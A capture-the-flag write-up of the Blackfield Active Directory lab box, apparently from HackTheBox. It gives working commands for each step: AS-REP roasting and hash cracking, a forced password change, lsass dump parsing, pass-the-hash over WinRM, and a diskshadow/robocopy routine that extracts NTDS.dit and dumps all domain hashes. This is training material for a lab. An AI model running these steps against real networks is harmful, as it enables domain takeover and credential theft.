Blackfield
Overview
Blackfield is a hard Windows box built around a three-hop Active Directory chain. The profiles$ SMB share leaks a large username list with no credentials needed. AS-REP roasting finds the support account has pre-auth disabled, and rockyou.txt cracks its hash. BloodHound maps a ForceChangePassword right from support to audit2020, which grants access to the forensic share. That share holds a memory dump of lsass.exe; parsing it with pypykatz recovers svc_backup’s NTLM hash. svc_backup has WinRM access and belongs to the Backup Operators group — specifically SeBackupPrivilege — which is used with a diskshadow script to create a VSS snapshot, robocopy NTDS.dit, and dump all domain hashes.
Path: anonymous SMB → username enumeration → AS-REP roast support → ForceChangePassword → audit2020 → forensic share → lsass.dmp → svc_backup NTLM → SeBackupPrivilege → VSS → NTDS.dit → Administrator hash.
Enumeration
$ nmap 10.10.10.192 -Pn -p- -A
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
5985/tcp open http Microsoft HTTPAPI httpd 2.0

Domain: BLACKFIELD.local, hostname DC01. WinRM on 5985 means that any account with Remote Management access will land a shell. The clock skew from the scan output is a reminder to sync time before Kerberos operations.
SMB shares
$ smbclient -L //blackfield.local
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
profiles$ is accessible anonymously. It contains hundreds of empty user directories — a clean username list. Parsing the share output to extract the first column gives users.txt.
$ smbclient //blackfield.local/profiles$ -N -c "ls" | awk '{print $1}' > users.txt
Foothold — AS-REP Roasting
With a large username list, checking for accounts with pre-authentication disabled is a quick win:
$ GetNPUsers.py -usersfile users.txt blackfield.local/ -dc-ip 10.10.10.192 \
-format hashcat -outputfile hashes.txt
After fixing the clock skew with rdate, the command returns a roastable hash for support. Cracking against rockyou.txt:
$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

The support account’s password is recovered.
Lateral Movement — ForceChangePassword to audit2020
With support credentials, BloodHound can be collected to map AD rights:
$ python3 bloodhound.py -u support -d BLACKFIELD.local -c All --zip -ns 10.10.10.192
Querying shortest paths from owned principals in BloodHound reveals that support has ForceChangePassword on audit2020:

Changing audit2020’s password from Linux:
$ net rpc password "audit2020" "newP@ssword2022" \
-U "BLACKFIELD"/"support"%"#00^BlackKnight" -S "BLACKFIELD.local"
Verifying access to the forensic share:
$ smbclient -U "audit2020" //BLACKFIELD.local/forensic
The share contains three directories — commands_output, memory_analysis, and tools. Inside memory_analysis is lsass.zip, which holds lsass.dmp.
User — lsass Dump → svc_backup Hash
Parsing the dump with pypykatz (or mimikatz) to extract cached credentials recovers svc_backup’s NTLM hash:

$ evil-winrm -u "svc_backup" -H <svc_backup_hash> -i blackfield.local
Checking privileges:
*Evil-WinRM* PS> whoami /all
The account is a member of Backup Operators and holds SeBackupPrivilege — the right to read any file on the filesystem, bypassing ACLs.
Privilege Escalation — SeBackupPrivilege via Diskshadow
SeBackupPrivilege can be weaponized with diskshadow to create a VSS snapshot of C: and then use robocopy (which respects backup semantics) to copy NTDS.dit and the SYSTEM hive out.
A diskshadow script handles the VSS side:
set verbose ON
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
*Evil-WinRM* PS> upload commands.dsh
*Evil-WinRM* PS> diskshadow /s commands.dsh


Then copy the hive and NTDS from the shadow:
*Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.SAV
*Evil-WinRM* PS> robocopy E:\Windows\NTDS C:\Windows\Temp\ntds ntds.dit /b
Download both files and run secretsdump locally:
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL


With the Administrator hash, pass-the-hash into the box:
$ evil-winrm -u Administrator -H <admin_hash> -i blackfield.local
Takeaways
- Large anonymous profile shares are a gold mine for username enumeration — even empty home directories establish a valid user list that feeds AS-REP roasting.
- SeBackupPrivilege is a full domain compromise primitive. A Backup Operators member can create a VSS snapshot and robocopy NTDS.dit with no additional rights required; the
diskshadowscripted approach avoids interactive limitations and works reliably over WinRM.